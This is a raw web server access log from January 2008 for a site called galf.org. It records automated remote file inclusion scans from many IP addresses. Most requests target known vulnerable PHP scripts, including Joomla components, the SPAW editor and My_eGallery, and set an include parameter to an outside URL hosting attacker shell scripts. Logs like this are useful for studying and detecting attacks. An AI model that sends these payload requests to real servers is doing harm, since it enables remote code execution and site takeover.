209.62.26.18 - - [14/Jan/2008:11:55:06 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
168.243.203.247 - - [14/Jan/2008:11:56:34 -0800] "GET /logs/access_071217.log/default.php?page=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:11:56:49 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.197.170.165 - - [14/Jan/2008:11:57:05 -0800] "GET /logs/access_071029.log/contenido/classes/class.inuse.php?cfg[path][contenido]=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.197.170.165 - - [14/Jan/2008:11:57:05 -0800] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.197.170.165 - - [14/Jan/2008:11:57:05 -0800] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.133.111.29 - - [14/Jan/2008:11:57:20 -0800] "GET /logs/access_071217.log/main.php?s=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.133.111.29 - - [14/Jan/2008:11:57:20 -0800] "GET /main.php?s=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.133.111.29 - - [14/Jan/2008:11:57:21 -0800] "GET /logs/main.php?s=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.52.170.162 - - [14/Jan/2008:11:58:20 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.170.162 - - [14/Jan/2008:11:59:24 -0800] "GET /logs/access_071210.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.70.232.156 - - [14/Jan/2008:12:00:14 -0800] "GET /logs/access_071210.log/modules/My_eGallery/index.php?basepath=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.70.232.156 - - [14/Jan/2008:12:00:14 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.70.232.156 - - [14/Jan/2008:12:00:14 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.70.232.156 - - [14/Jan/2008:12:00:26 -0800] "GET /logs/access_070826.log/modules/My_eGallery/index.php?basepath=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.65.100.5 - - [14/Jan/2008:12:01:18 -0800] "GET //eva/index.php3?aide=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
217.65.100.5 - - [14/Jan/2008:12:01:19 -0800] "GET /logs//eva/index.php3?aide=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
208.186.169.183 - - [14/Jan/2008:12:01:30 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
70.86.201.130 - - [14/Jan/2008:12:01:35 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.nettogolf.se/nettogolf/filer/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.201.130 - - [14/Jan/2008:12:01:35 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.nettogolf.se/nettogolf/filer/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.201.130 - - [14/Jan/2008:12:01:43 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.nettogolf.se/nettogolf/filer/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.201.130 - - [14/Jan/2008:12:01:44 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.nettogolf.se/nettogolf/filer/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:12:01:50 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:12:01:50 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.84.193.50 - - [14/Jan/2008:12:02:11 -0800] "GET //eva/index.php3?aide=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
70.84.193.50 - - [14/Jan/2008:12:02:11 -0800] "GET /logs//eva/index.php3?aide=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
74.200.79.215 - - [14/Jan/2008:12:02:14 -0800] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.79.215 - - [14/Jan/2008:12:02:14 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.79.215 - - [14/Jan/2008:12:02:14 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.110.131.88 - - [14/Jan/2008:12:02:41 -0800] "GET /logs/access_071210.log/modules/My_eGallery/index.php?basepath=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
89.110.131.88 - - [14/Jan/2008:12:02:42 -0800] "GET /modules/My_eGallery/index.php?basepath=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
89.110.131.88 - - [14/Jan/2008:12:02:42 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:12:02:42 -0800] "GET /logs/access_070820.log/index2.php?x=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:12:02:46 -0800] "GET /logs/access_071008.log/index2.php?x=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.44.188.10 - - [14/Jan/2008:12:03:24 -0800] "GET /index.php?pag=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
207.44.188.10 - - [14/Jan/2008:12:03:30 -0800] "GET /logs/index.php?pag=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
66.70.232.156 - - [14/Jan/2008:12:04:02 -0800] "GET /logs/access_071210.log/modules/My_eGallery/index.php?basepath=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.70.232.156 - - [14/Jan/2008:12:04:02 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.70.232.156 - - [14/Jan/2008:12:04:02 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.70.232.156 - - [14/Jan/2008:12:04:16 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
38.102.88.101 - - [14/Jan/2008:12:04:23 -0800] "GET /logs/access_071217.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://vulnerable.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
38.102.88.101 - - [14/Jan/2008:12:04:24 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://vulnerable.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
38.102.88.101 - - [14/Jan/2008:12:04:24 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://vulnerable.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.52.216.28 - - [14/Jan/2008:12:04:37 -0800] "GET /logs/access_070917.log//login.php?dir=http://boringtime.com/banget?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.52.216.28 - - [14/Jan/2008:12:04:37 -0800] "GET /logs//login.php?dir=http://boringtime.com/banget?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:12:04:41 -0800] "GET /logs/access_071217.log/main.php?s=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:12:04:42 -0800] "GET /main.php?s=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:12:04:43 -0800] "GET /logs/main.php?s=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
89.110.131.88 - - [14/Jan/2008:12:04:53 -0800] "GET /logs/access_071001.log/modules/My_eGallery/index.php?basepath=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
80.249.117.99 - - [14/Jan/2008:12:06:00 -0800] "GET /logs/access_070910.log/admin/editeur/spaw_control.class.php?spaw_root=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.251.180 - - [14/Jan/2008:12:06:04 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.251.180 - - [14/Jan/2008:12:06:04 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.238.199.72 - - [14/Jan/2008:12:06:29 -0800] "GET /logs/access_071217.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.bettysbluestarlounge.com/Calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.72 - - [14/Jan/2008:12:06:30 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.bettysbluestarlounge.com/Calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.72 - - [14/Jan/2008:12:06:30 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.bettysbluestarlounge.com/Calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.87.96.4 - - [14/Jan/2008:12:06:56 -0800] "GET /logs/access_071210.log/modules/My_eGallery/index.php?basepath=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.87.96.4 - - [14/Jan/2008:12:06:57 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.87.96.4 - - [14/Jan/2008:12:06:57 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.70.232.156 - - [14/Jan/2008:12:07:01 -0800] "GET /logs/access_071001.log/modules/My_eGallery/index.php?basepath=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.249.117.99 - - [14/Jan/2008:12:07:04 -0800] "GET /logs/access_071210.log/admin/editeur/spaw_control.class.php?spaw_root=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:12:07:21 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:12:07:21 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.188.10 - - [14/Jan/2008:12:07:37 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.galf.org"
207.44.188.10 - - [14/Jan/2008:12:07:41 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
207.44.188.10 - - [14/Jan/2008:12:08:22 -0800] "GET //functions.php?include_path=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
207.44.188.10 - - [14/Jan/2008:12:08:27 -0800] "GET /logs//functions.php?include_path=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:12:08:36 -0800] "GET /logs/access_070910.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:12:08:36 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:12:08:36 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.34.201.90 - - [14/Jan/2008:12:09:05 -0800] "GET /logs/access_071203.log//modules/Forums/groupcp.php?phpbb_root_path=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.7.209.233 - - [14/Jan/2008:12:09:39 -0800] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.209.233 - - [14/Jan/2008:12:09:39 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.209.233 - - [14/Jan/2008:12:09:39 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.87.96.4 - - [14/Jan/2008:12:09:56 -0800] "GET /logs/access_071210.log/modules/My_eGallery/index.php?basepath=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.87.96.4 - - [14/Jan/2008:12:09:56 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.87.96.4 - - [14/Jan/2008:12:09:57 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:12:09:57 -0800] "GET /logs/access_071210.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.84.66.3 - - [14/Jan/2008:12:10:18 -0800] "GET //skin/zero_vote/error.php?dir=http://theseoguide.com/administrator/templates/mambo_admin/css/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.87.96.4 - - [14/Jan/2008:12:10:21 -0800] "GET /logs/access_071001.log/modules/My_eGallery/index.php?basepath=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:10:34 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:10:34 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:11:20 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:11:21 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.186.169.183 - - [14/Jan/2008:12:11:29 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.52.216.28 - - [14/Jan/2008:12:11:52 -0800] "GET //skin/zero_vote/error.php?dir=http://boringtime.com/banget?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.183.20 - - [14/Jan/2008:12:12:48 -0800] "GET /logs/access_071008.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.31.183.20 - - [14/Jan/2008:12:12:48 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.31.183.20 - - [14/Jan/2008:12:12:49 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.31.183.20 - - [14/Jan/2008:12:12:49 -0800] "GET /logs/access_070806.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
38.102.88.101 - - [14/Jan/2008:12:12:56 -0800] "GET /com_jcs/view/register.php?mosConfig_absolute_path=http://vulnerable.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
38.102.88.101 - - [14/Jan/2008:12:12:56 -0800] "GET /com_jcs/joomla.php?mosConfig_absolute_path=http://vulnerable.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.254.58.42 - - [14/Jan/2008:12:13:04 -0800] "GET /logs/access_070723.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:13:08 -0800] "GET /logs/access_070702.log//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:13:09 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:13:09 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.160.203.190 - - [14/Jan/2008:12:13:10 -0800] "GET /logs/access_071008.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.160.203.190 - - [14/Jan/2008:12:13:10 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.160.203.190 - - [14/Jan/2008:12:13:10 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
203.87.96.4 - - [14/Jan/2008:12:13:59 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.87.96.4 - - [14/Jan/2008:12:15:02 -0800] "GET /logs/access_071001.log/modules/My_eGallery/index.php?basepath=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.31.183.20 - - [14/Jan/2008:12:15:36 -0800] "GET /logs/access_071231.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.31.183.20 - - [14/Jan/2008:12:15:37 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.31.183.20 - - [14/Jan/2008:12:15:37 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:16:21 -0800] "GET /logs/access_070702.log//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:16:22 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:16:22 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.133.111.29 - - [14/Jan/2008:12:17:14 -0800] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.133.111.29 - - [14/Jan/2008:12:17:14 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.133.111.29 - - [14/Jan/2008:12:17:15 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.8.75 - - [14/Jan/2008:12:18:29 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.8.75 - - [14/Jan/2008:12:18:29 -0800] "GET /logs/access_070910.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:18:40 -0800] "GET /logs/access_070702.log//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:18:40 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:18:40 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:18:44 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
